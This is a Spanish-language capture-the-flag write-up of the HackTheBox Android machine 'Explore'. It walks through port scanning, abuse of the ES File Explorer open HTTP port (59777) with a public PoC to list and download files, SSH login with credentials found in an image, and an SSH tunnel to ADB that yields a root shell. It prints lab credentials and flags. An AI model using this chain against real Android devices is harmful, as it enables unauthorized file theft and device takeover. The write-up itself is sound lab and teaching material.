Explorer, la primera maquina android en HTB. Encontramos un puerto relacionado a ES File Explorer que expone una API que permite listar y descargar archivos del dispositivo, por donde descubrimos credenciales de acceso en una imagen. Para escalar privilegios utilizamos SSH para conectarnos con ADB a una shell privilegiada.
| Nombre |
Explore  |
| OS |
Android  |
| Puntos |
20 |
| Dificultad |
Facil |
| IP |
10.10.10.247 |
| Maker |
bertolis |
|
Matrix
|
{
"type":"radar",
"data":{
"labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
"datasets":[
{
"label":"User Rate", "data":[5.2, 4.4, 5, 5, 5.6],
"backgroundColor":"rgba(75, 162, 189,0.5)",
"borderColor":"#4ba2bd"
},
{
"label":"Maker Rate",
"data":[0, 0, 0, 0, 0],
"backgroundColor":"rgba(154, 204, 20,0.5)",
"borderColor":"#9acc14"
}
]
},
"options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
"angleLines":{"color":"rgba(255, 255, 255,0.6)"},
"gridLines":{"color":"rgba(255, 255, 255,0.6)"}
}
}
}
|
Recon
Nmap
Escaneo de puertos con nmap nos muestra multiples puertos abiertos: http (59777), ssh (2222), desconocido (38793).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
# Nmap 7.91 scan initiated Sat Jul 3 03:26:05 2021 as: nmap -Pn -sV -sC -p2222,38793,59777 -oN scan_ports 10.10.10.247
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
38793/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 03 Jul 2021 04:01:28 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
[ ... REDACTED ... ]
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
# Nmap done at Sat Jul 3 03:27:47 2021 -- 1 IP address (1 host up) scanned in 102.15 seconds
|
Puerto HTTP
En el puerto 59777 no encontramos ningun tipo de informacion.
1
2
3
4
5
6
7
8
|
π ~/htb/explore ❯ curl -s http://10.10.10.247:59777/
FORBIDDEN: No directory listing.
π ~/htb/explore ❯ curl -sI http://10.10.10.247:59777/
HTTP/1.0 403 Forbidden
Content-Type: text/plain
Date: Sat, 3 Jul 2021 05:07:04 GMT
π ~/htb/explore ❯
|
Feroxbuster
Tras ejecutar feroxbuster encontramos multiples directorios y archivos, algunos de estos nos indican que es de un dispositivo Android, entre estos vemos la flag root a la cual no tenemos acceso.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
π ~/htb/explore ❯ feroxbuster --url http://10.10.10.247:59777/ -w /usr/share/wordlists/dirb/big.txt -T 10 -x txt,html,json,xml,php,htm,db,key
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.247:59777/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 10
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [txt, html, json, xml, php, htm, db, key]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 1l 3w 0c http://10.10.10.247:59777/data
301 1l 3w 0c http://10.10.10.247:59777/etc
301 1l 3w 0c http://10.10.10.247:59777/data/data
301 1l 3w 0c http://10.10.10.247:59777/config
301 1l 3w 0c http://10.10.10.247:59777/d
403 1l 4w 0c http://10.10.10.247:59777/init
301 1l 3w 0c http://10.10.10.247:59777/mnt
301 1l 3w 0c http://10.10.10.247:59777/storage
301 1l 3w 0c http://10.10.10.247:59777/etc/init
200 2l 4w 56c http://10.10.10.247:59777/etc/hosts
301 1l 3w 0c http://10.10.10.247:59777/oem
403 1l 4w 0c http://10.10.10.247:59777/data/root.txt
301 1l 3w 0c http://10.10.10.247:59777/etc/permissions
301 1l 3w 0c http://10.10.10.247:59777/data/property
301 1l 3w 0c http://10.10.10.247:59777/bin
200 621l 1669w 29926c http://10.10.10.247:59777/etc/fonts.xml
[... REDACTED ...]
301 1l 3w 0c http://10.10.10.247:59777/data/adb
301 1l 3w 0c http://10.10.10.247:59777/data/backup
301 1l 3w 0c http://10.10.10.247:59777/data/system
301 1l 3w 0c http://10.10.10.247:59777/data/local/traces
301 1l 3w 0c http://10.10.10.247:59777/system/etc
301 1l 3w 0c http://10.10.10.247:59777/data/data/android
|
User
Es File Explorer
Realizamos una busqueda del puerto en dispositivos android y encontramos un post de Portswigger en el que describe una vulnerabilidad en la aplicacion ES File Explorer la cual expone un servidor HTTP en el puerto 59777 localmente por medio del cual un atacante puede enviar multiples comandos en formato JSON.
PoC - Es File Explorer
El PoC se encuentra en Github - fs0c131y, basicamente realiza distintas solicitudes en formato JSON con diferentes commandos para obtener informacion del dispositivo, listar y descargar archivos, fotos, videos, audios, etc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
# curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777
π ESFileExplorerOpenPortVuln master ❯ python poc.py list
######################
# Available Commands #
######################
listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info. Package name parameter is needed
appPull: Pull an app from the device
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed
|
Credenciales
Relizamos una enumeracion con los diferentes comandos, y encontramos imagenes las cuales descargamos.
1
2
3
4
5
6
7
8
9
|
π ESFileExplorerOpenPortVuln master ❯ python poc.py --cmd listPics --host 10.10.10.247
[*] Executing command: listPics on 10.10.10.247
[*] Server responded with: 200
{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}
π ESFileExplorerOpenPortVuln master ❯
|
En una de ellas se muestra un texto que segun el nombre del archivo podrian indicar credenciales.
1
|
kristi:kr1st!5h@Rp3xPl0r3!
|
Shell
Utilizamos las credenciales en el servicio SSH en el puerto 2222 por donde logramos obtener acceso.
1
2
3
4
5
6
7
|
π ~/htb/explore ❯ ssh kristi@10.10.10.247 -p 2222 # Kr1sT!5h@Rp3xPl0r3!
Password authentication
Password:
:/ $ whoami; id; pwd
u0_a76
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
/
|
Enumerando los directorios encontramos la flag user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
:/sdcard $ ls -lah
total 34K
drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 .
drwx--x--x 4 root everybody 4.0K 2021-03-13 17:16 ..
drwxrwx--- 5 root everybody 4.0K 2021-03-13 17:30 .estrongs
-rw-rw---- 1 root everybody 72 2021-04-21 01:01 .userReturn
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Alarms
drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:16 Android
drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:38 DCIM
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:37 Download
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Movies
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Music
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Notifications
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Pictures
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Podcasts
drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Ringtones
drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 backups
drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:12 dianxinos
-rw-rw---- 1 root everybody 33 2021-03-13 18:28 user.txt
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
:/sdcard $
|
Privesc
Localmente encontramos el puerto 5555 que comunmente es utilizado por adb.
1
2
3
4
5
6
7
8
9
|
:/sdcard $ netstat -ntpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name
tcp6 0 0 :::2222 :::* LISTEN 3427/net.xnano.android.sshserver
tcp6 0 0 ::ffff:127.0.0.1:45231 :::* LISTEN -
tcp6 0 0 :::5555 :::* LISTEN -
tcp6 0 0 ::ffff:10.10.10.2:34293 :::* LISTEN -
tcp6 0 0 :::59777 :::* LISTEN -
:/sdcard $
|
ADB
Tras escanear el puerto aparece como filtrado y algunas veces como abierto, intentando una conexion con adb se muestra con tiempo de conexion agotado.
1
2
3
4
5
6
7
8
9
10
11
|
# nmap 10.10.10.247 -p 5555
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.071s latency).
PORT STATE SERVICE
5555/tcp filtered freeciv
#
π ~/htb/explore ❯ adb connect 10.10.10.247:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
failed to connect to '10.10.10.247:5555': Connection timed out
|
Utilizando SSH obtuvimos el puerto 5555 localmente utilizando las credenciales anteriormente encontradas.
1
2
|
# give me port 5555
ssh -L 5555:0.0.0.0:5555 kristi@10.10.10.247 -p 2222 # Kr1sT!5h@Rp3xPl0r3!
|
Con adb nos conectamos con una shell con privilegios bajos para probar la conexion.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
# check or kill server already started
# connect to the port 5555
π ~/htb/explore ❯ adb kill-server
π ~/htb/explore ❯ adb connect 127.0.0.1:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 127.0.0.1:5555
# list devices
π ~/htb/explore ❯ adb devices
List of devices attached
127.0.0.1:5555 device
emulator-5554 device
# low priv shell
π ~/htb/explore ❯ adb -s emulator-5554 shell
x86_64:/ $ whoami
shell
x86_64:/ $
|
Shell Root
Le “dimos” permisos root con adb al dispositivo y tras conectarnos obtuvimos una shell como root y con ello la flag root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
π ~/htb/explore ❯ adb -s emulator-5554 root
π ~/htb/explore ❯ adb -s emulator-5554 shell
x86_64:/ # whoami
root
x86_64:/ # cd data
x86_64:/data # ls
adb backup local nfc ssh_starter.sh vendor
anr bootchart lost+found ota system vendor_ce
app cache media ota_package system_ce vendor_de
app-asec dalvik-cache mediadrm property system_de
app-ephemeral data misc resource-cache tombstones
app-lib drm misc_ce root.txt user
app-private es_starter.sh misc_de ss user_de
x86_64:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
x86_64:/data #
|
